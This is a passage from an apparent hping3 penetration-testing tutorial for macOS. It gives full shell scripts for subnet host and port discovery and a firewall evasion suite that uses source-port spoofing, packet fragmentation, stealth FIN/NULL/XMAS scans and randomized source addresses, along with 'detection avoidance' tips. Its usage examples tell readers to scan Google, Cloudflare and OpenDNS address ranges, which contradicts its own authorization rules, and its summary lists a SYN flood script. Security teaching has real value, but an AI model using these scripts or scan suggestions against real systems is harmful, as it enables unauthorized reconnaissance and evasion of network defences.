if [ -z "$network" ]; then
echo "Usage: network_discovery <network> [start_ip] [end_ip] [test_ports]"
echo "Example: network_discovery 192.168.1 1 100 '22,80,443,8080'"
return 1
fi
echo "🔍 Comprehensive Network Discovery"
echo "=================================="
echo "Network: $network.$start_ip-$end_ip"
echo "Test ports: $test_ports"
echo ""
# Create results directory
local results_dir="/tmp/network_discovery_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$results_dir"
# Phase 1: ICMP Discovery
echo "📡 Phase 1: ICMP Host Discovery"
echo "==============================="
local icmp_results="$results_dir/icmp_results.txt"
for i in $(seq $start_ip $end_ip); do
(hping3 -1 -c 1 $network.$i 2>&1 | grep -E "(bytes from|icmp.*seq=)" && echo "$network.$i" >> "$icmp_results") &
# Limit concurrent processes on macOS
if (( i % 20 == 0 )); then
wait
echo " Tested up to $network.$i..."
fi
done
wait
if [ -s "$icmp_results" ]; then
echo "✅ ICMP-responsive hosts:"
cat "$icmp_results" | while read host; do
echo " - $host [ICMP]"
done
else
echo "❌ No ICMP-responsive hosts found"
fi
echo ""
# Phase 2: TCP Discovery
echo "🚪 Phase 2: TCP Port Discovery"
echo "=============================="
local tcp_results="$results_dir/tcp_results.txt"
# Zsh-compatible array splitting
PORT_ARRAY=(${(s:,:)test_ports})
for i in $(seq $start_ip $end_ip); do
for port in "${PORT_ARRAY[@]}"; do
(hping3 -S -p $port -c 1 $network.$i 2>&1 | grep "flags=SA" && echo "$network.$i:$port" >> "$tcp_results") &
done
# Limit concurrent processes
if (( i % 10 == 0 )); then
wait
echo " Tested up to $network.$i..."
fi
done
wait
if [ -s "$tcp_results" ]; then
echo "✅ TCP-responsive hosts and ports:"
cat "$tcp_results" | while read host_port; do
echo " - $host_port [TCP]"
done
else
echo "❌ No TCP-responsive hosts found"
fi
echo ""
echo "📊 Discovery Summary"
echo "==================="
echo "Results saved in: $results_dir"
echo "ICMP hosts: $([ -s "$icmp_results" ] && wc -l < "$icmp_results" || echo 0)"
echo "TCP services: $([ -s "$tcp_results" ] && wc -l < "$tcp_results" || echo 0)"
echo ""
echo "🧹 Clean up with: rm -rf $results_dir"
}
# Zsh-compatible check for direct execution
if [[ "${(%):-%N}" == "${0}" ]] || [[ "$ZSH_EVAL_CONTEXT" == "toplevel" ]]; then
network_discovery "$@"
fi
EOF
chmod +x ./network_discovery.sh
How to Run:
# Basic Usage - Scan entire subnet with default ports (22,80,443)
./network_discovery.sh 192.168.1
# Scan specific IP across a port range
./network_discovery.sh 192.168.1 1 50
# Scan specific IP using a custom port list
./network_discovery.sh 192.168.1 1 100 '22,80,443,8080,3306'
# Home Network Scans
./network_discovery.sh 192.168.1 1 20 '80,443' # Router and devices
./network_discovery.sh 192.168.0 1 30 '22,80,443,8080' # Alternative subnet
./network_discovery.sh 10.0.0 1 50 '22,80,443,3389,445' # Corporate network range
# Service-Specific Discovery
./network_discovery.sh 192.168.1 1 254 '80,443,8080,8443' # Web servers only
./network_discovery.sh 192.168.1 1 100 '22' # SSH servers only
./network_discovery.sh 10.0.0 1 50 '3306,5432,27017,6379' # Database servers
./network_discovery.sh 192.168.1 1 100 '445,3389,139' # Windows machines
./network_discovery.sh 192.168.1 1 50 '3000,5000,8000,9000' # Dev servers
# Quick Targeted Scans
./network_discovery.sh 192.168.1 1 10 # First 10 IPs, default ports
./network_discovery.sh 192.168.1 100 100 '21,22,23,25,80,110,443,445,3306,3389,5900,8080' # Single host, many ports
./network_discovery.sh 172.16.0 1 30 '80,443' # Fast web discovery
# Your Local Network (based on your IP: 10.223.23.133)
./network_discovery.sh 10.223.23 130 140 '22,80,443' # Scan near your IP
./network_discovery.sh 10.223.23 1 254 '80,443' # Full subnet web scan
./network_discovery.sh 10.223.23 133 133 '1-65535' # Scan all ports on your IP
# Localhost Testing
./network_discovery.sh 127.0.0 1 1 '22,80,443,3000,8080' # Test on localhost
# Advanced Usage with sudo (for better ICMP results)
sudo ./network_discovery.sh 192.168.1 1 50
sudo ./network_discovery.sh 10.223.23 130 140 '22,80,443,8080'
# Comprehensive port scan
./network_discovery.sh 192.168.1 1 20 '21,22,23,25,53,80,110,143,443,445,993,995,1433,3306,3389,5432,5900,6379,8080,8443,27017'
# Chain with other commands
./network_discovery.sh 192.168.1 1 10 && echo "Scan complete"
./network_discovery.sh 192.168.1 1 20 '22' | tee scan_results.txt
# View and manage results
ls -la /tmp/network_discovery_* # List all scan results
cat /tmp/network_discovery_*/icmp_results.txt # View ICMP results
cat /tmp/network_discovery_*/tcp_results.txt # View TCP results
rm -rf /tmp/network_discovery_* # Clean up all results
### LOCAL MACHINE EXAMPLE
# Targeting your local machine and common services. Let me first check what services are running on your machine:
netstat -an | grep LISTEN | grep -E '\.([0-9]+)\s' | awk '{print $4}' | sed 's/.*\.//' | sort -u | head -20
18313
5000
53
55296
61611
65535
7000
9000
9010
9277
### Check your actual IP address to create working examples:
ifconfig | grep "inet " | grep -v 127.0.0.1 | awk '{print $2}' | head -1
10.223.23.133
### Now let's test with your actual IP and the ports that are listening. Note that hping3 often needs sudo privileges for proper ICMP and TCP SYN scanning:
sudo ./network_discovery.sh 10.223.23 133 133 '5000,7000,9000,9010,53'
### EXAMPLES THAT WILL RETURN SUCCESSFUL RESULTS
# 1. Scan Google's servers (known to respond)
sudo ./network_discovery.sh 142.251.216 78 78 '80,443'
sudo ./network_discovery.sh 142.251.216 1 10 '80,443'
# 2. Scan Cloudflare DNS (highly available)
sudo ./network_discovery.sh 1.1.1 1 1 '53,80,443'
sudo ./network_discovery.sh 1.0.0 1 1 '53,80,443'
# 3. Scan popular DNS servers
sudo ./network_discovery.sh 8.8.8 8 8 '53,443' # Google DNS
sudo ./network_discovery.sh 8.8.4 4 4 '53,443' # Google DNS secondary
sudo ./network_discovery.sh 208.67.222 222 222 '53,443' # OpenDNS
# 4. Scan your local gateway (should respond on some ports)
sudo ./network_discovery.sh 10.223.22 1 1 '80,443,22,53,8080'
# 5. Scan your local subnet for common services
sudo ./network_discovery.sh 10.223.23 1 10 '22,80,443,445,3389,5900'
sudo ./network_discovery.sh 10.223.23 130 140 '80,443,22,3389'
# 6. Quick test with well-known servers
sudo ./network_discovery.sh 93.184.216 34 34 '80,443' # example.com
sudo ./network_discovery.sh 104.17.113 106 106 '80,443' # Cloudflare IP
# 7. Scan for web servers in your network
sudo ./network_discovery.sh 10.223.23 1 254 '80,443'
# 8. Multiple reliable targets in one scan
sudo ./network_discovery.sh 1.1.1 1 2 '53,80,443' # Cloudflare DNS range
# 9. Test against localhost services (based on your running ports)
sudo ./network_discovery.sh 127.0.0 1 1 '5000,7000,9000,9010,53'
# 10. Comprehensive scan of known responsive range
sudo ./network_discovery.sh 142.251.216 70 80 '80,443,22'
Parameters Explained:
**network** (required): Network base (e.g., “192.168.1”)
**start_ip** (optional, default: 1): Starting host number
**end_ip** (optional, default: 254): Ending host number
**test_ports** (optional, default: “22,80,443”): Comma-separated port list
Discovery Phases:
1. **ICMP Discovery**: Tests basic connectivity with ping
2. **TCP Discovery**: Tests specific services on each host
3. **Results Analysis**: Provides comprehensive summary
Script 10: Firewall Evasion Test Suite
Purpose:
Performs a comprehensive battery of firewall evasion techniques to test security controls and identify potential bypass methods.
Create the Script:
cat > ./firewall_evasion_test.sh << 'EOF'
#!/bin/zsh
firewall_evasion_test() {
local target=$1
local port=${2:-80}
if [ -z "$target" ]; then
echo "Usage: firewall_evasion_test [port]"
echo "Example: firewall_evasion_test example.com 443"
return 1
fi
echo "🛡️ Comprehensive Firewall Evasion Test Suite"
echo "============================================="
echo "Target: $target:$port"
echo "Testing multiple evasion techniques..."
echo ""
# Test 1: Normal SYN scan (baseline)
echo "🔍 Test 1: Normal SYN Scan (Baseline)"
echo "====================================="
result1=$(hping3 -S -p $port -c 1 $target 2>&1)
echo "$result1"
if echo "$result1" | grep -q "flags=SA"; then
echo "✅ BASELINE: Port appears OPEN"
else
echo "❌ BASELINE: Port appears CLOSED/FILTERED"
fi
echo ""
# Test 2: Source port 53 (DNS)
echo "🔍 Test 2: DNS Source Port Spoofing (53)"
echo "========================================"
result2=$(hping3 -S -p $port -s 53 -c 1 $target 2>&1)
echo "$result2"
if echo "$result2" | grep -q "flags=SA"; then
echo "✅ DNS SPOOF: Bypass successful!"
else
echo "❌ DNS SPOOF: No bypass detected"
fi
echo ""
# Test 3: Source port 20 (FTP-DATA)
echo "🔍 Test 3: FTP-DATA Source Port Spoofing (20)"
echo "=============================================="
result3=$(hping3 -S -p $port -s 20 -c 1 $target 2>&1)
echo "$result3"
if echo "$result3" | grep -q "flags=SA"; then
echo "✅ FTP SPOOF: Bypass successful!"
else
echo "❌ FTP SPOOF: No bypass detected"
fi
echo ""
# Test 4: Fragmented packets
echo "🔍 Test 4: Packet Fragmentation"
echo "==============================="
result4=$(hping3 -S -p $port -f -c 1 $target 2>&1)
echo "$result4"
if echo "$result4" | grep -q "flags=SA"; then
echo "✅ FRAGMENTATION: Bypass successful!"
else
echo "❌ FRAGMENTATION: No bypass detected"
fi
echo ""
# Test 5: FIN scan
echo "🔍 Test 5: FIN Scan Evasion"
echo "==========================="
result5=$(hping3 -F -p $port -c 1 $target 2>&1)
echo "$result5"
if ! echo "$result5" | grep -q "flags=R" && ! echo "$result5" | grep -q "ICMP"; then
echo "✅ FIN SCAN: Potential bypass (no response)"
else
echo "❌ FIN SCAN: No bypass detected"
fi
echo ""
# Test 6: NULL scan
echo "🔍 Test 6: NULL Scan Evasion"
echo "============================"
result6=$(hping3 -p $port -c 1 $target 2>&1)
echo "$result6"
if ! echo "$result6" | grep -q "flags=R" && ! echo "$result6" | grep -q "ICMP"; then
echo "✅ NULL SCAN: Potential bypass (no response)"
else
echo "❌ NULL SCAN: No bypass detected"
fi
echo ""
# Test 7: XMAS scan
echo "🔍 Test 7: XMAS Scan Evasion"
echo "============================"
result7=$(hping3 -F -P -U -p $port -c 1 $target 2>&1)
echo "$result7"
if ! echo "$result7" | grep -q "flags=R" && ! echo "$result7" | grep -q "ICMP"; then
echo "✅ XMAS SCAN: Potential bypass (no response)"
else
echo "❌ XMAS SCAN: No bypass detected"
fi
echo ""
# Test 8: Random source addresses
echo "🔍 Test 8: Random Source Address"
echo "================================"
result8=$(hping3 -S -p $port --rand-source -c 3 $target 2>&1)
echo "$result8"
if echo "$result8" | grep -q "flags=SA"; then
echo "✅ RANDOM SOURCE: Bypass successful!"
else
echo "❌ RANDOM SOURCE: No bypass detected"
fi
echo ""
# Summary
echo "📊 Evasion Test Summary"
echo "======================="
echo "Target: $target:$port"
echo "Tests completed: 8"
echo ""
echo "Potential bypasses detected:"
[[ "$result2" =~ "flags=SA" ]] && echo " ✅ DNS source port spoofing"
[[ "$result3" =~ "flags=SA" ]] && echo " ✅ FTP-DATA source port spoofing"
[[ "$result4" =~ "flags=SA" ]] && echo " ✅ Packet fragmentation"
[[ ! "$result5" =~ "flags=R" && ! "$result5" =~ "ICMP" ]] && echo " ✅ FIN scan stealth"
[[ ! "$result6" =~ "flags=R" && ! "$result6" =~ "ICMP" ]] && echo " ✅ NULL scan stealth"
[[ ! "$result7" =~ "flags=R" && ! "$result7" =~ "ICMP" ]] && echo " ✅ XMAS scan stealth"
[[ "$result8" =~ "flags=SA" ]] && echo " ✅ Random source addressing"
echo ""
echo "🔒 Recommendations:"
echo " - Review firewall rules for source port filtering"
echo " - Enable stateful packet inspection"
echo " - Configure fragment reassembly"
echo " - Monitor for stealth scan patterns"
}
if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
firewall_evasion_test "$@"
fi
EOF
chmod +x ./firewall_evasion_test.sh
How to Run:
# Test firewall evasion on port 80
sudo ./firewall_evasion_test.sh example.com
# Test firewall evasion on HTTPS port
sudo ./firewall_evasion_test.sh example.com 443
Evasion Techniques Tested:
1. **Baseline SYN scan**: Normal connection attempt
2. **DNS source port spoofing**: Uses port 53 as source
3. **FTP-DATA source port spoofing**: Uses port 20 as source
4. **Packet fragmentation**: Splits packets to evade inspection
5. **FIN scan**: Uses FIN flag for stealth
6. **NULL scan**: No flags set for evasion
7. **XMAS scan**: Multiple flags for confusion
8. **Random source addressing**: Obscures attack origin
Important Usage Notes:
macOS-Specific Considerations:
– **Root privileges required**: Most scripts need `sudo` for raw socket access
– **Process limits**: macOS limits concurrent processes, scripts include throttling
– **Firewall interference**: macOS firewall may block outgoing packets
– **Network interfaces**: Scripts auto-detect primary interface
Performance Optimization:
– Use appropriate delays to avoid overwhelming targets
– Limit concurrent processes on macOS (typically 20-50)
– Monitor system resources during intensive scans
– Use temporary files for result collection
Detection Avoidance:
# Slow scanning to avoid detection
sudo ./tcp_syn_scan.sh example.com 1 100 5
# Random timing patterns
sudo ./source_port_scan.sh example.com 80 53 1
Integration with Other Tools:
# Combine with nmap for verification
sudo ./common_ports_scan.sh example.com
nmap -sS example.com
# Use with tcpdump for packet analysis
sudo tcpdump -i en0 host example.com &
sudo ./tcp_syn_ping.sh example.com
# Solution: Use sudo for raw socket access
sudo ./script_name.sh
Command Not Found:
# Solution: Verify hping3 installation
brew install hping
which hping3
Network Interface Issues:
# Solution: Specify interface manually
hping3 -I en0 -S -p 80 example.com
Script Debugging:
# Enable verbose output
set -x
source ./script_name.sh
# Check script syntax
zsh -n ./script_name.sh
Legal and Ethical Guidelines:
Before You Begin:
– ✅ Obtain written authorization from system owners
– ✅ Define clear scope and boundaries
– ✅ Establish communication channels
– ✅ Plan for incident response
– ✅ Document all activities
During Testing:
– 🔍 Monitor system impact continuously
– ⏸️ Stop immediately if unauthorized access is gained
– 📝 Document all findings and methods
– 🚫 Do not access or modify data
– ⚠️ Report critical vulnerabilities promptly
After Testing:
– 📋 Provide comprehensive reports
– 🗑️ Securely delete all collected data
– 🤝 Follow responsible disclosure practices
– 📚 Share lessons learned (with permission)
Conclusion
This comprehensive hping3 guide provides 10 essential penetration testing scripts specifically optimized for macOS systems. Each script includes detailed explanations, parameter descriptions, and practical examples using example.com as the target.
Key Takeaways:
– **Authorization is mandatory** – Never test without explicit permission
– **macOS optimization** – Scripts include platform-specific considerations
– **Comprehensive coverage** – From basic discovery to advanced evasion
– **Safety features** – Built-in protections and confirmation prompts
– **Educational value** – Detailed explanations for learning
Next Steps:
1. Set up your macOS environment with the installation steps
2. Create the script directory and download the scripts
3. Practice on authorized targets or lab environments
4. Integrate with other security tools for comprehensive testing
5. Develop your own custom scripts based on these examples
Remember: These tools are powerful and should be used responsibly. Always prioritize ethical considerations and legal compliance in your security testing activities.
Official Documentation:
– [hping3 Official Website](http://www.hping.org/)
– [hping3 Manual Page](https://linux.die.net/man/8/hping3)
Related Tools:
– **nmap**: Network discovery and port scanning
– **masscan**: High-speed port scanner
– **zmap**: Internet-wide network scanner
– **tcpdump**: Packet capture and analysis
Learning Resources:
– OWASP Testing Guide
– NIST Cybersecurity Framework
– CEH (Certified Ethical Hacker) materials
– OSCP (Offensive Security Certified Professional) training
Script Summary Table:
| Script | Purpose | Key Features |
|——–|———|————–|
| `icmp_ping.sh` | Basic host discovery | ICMP connectivity testing |
| `icmp_sweep.sh` | Network enumeration | Bulk host discovery |
| `tcp_syn_ping.sh` | Firewall-resistant discovery | TCP-based host detection |
| `tcp_syn_scan.sh` | Port scanning | Stealth SYN scanning |
| `common_ports_scan.sh` | Service discovery | Predefined port lists |
| `fin_scan.sh` | Stealth scanning | FIN flag evasion |
| `source_port_scan.sh` | Firewall bypass | Source port spoofing |
| `syn_flood_attack.sh` | DoS testing | Multi-process flooding |
| `network_discovery.sh` | Comprehensive recon | Combined techniques |
| `firewall_evasion_test.sh` | Security testing | Multiple evasion methods |
This guide provides everything needed to perform professional-grade penetration testing with hping3 on macOS systems while maintaining ethical and legal standards.
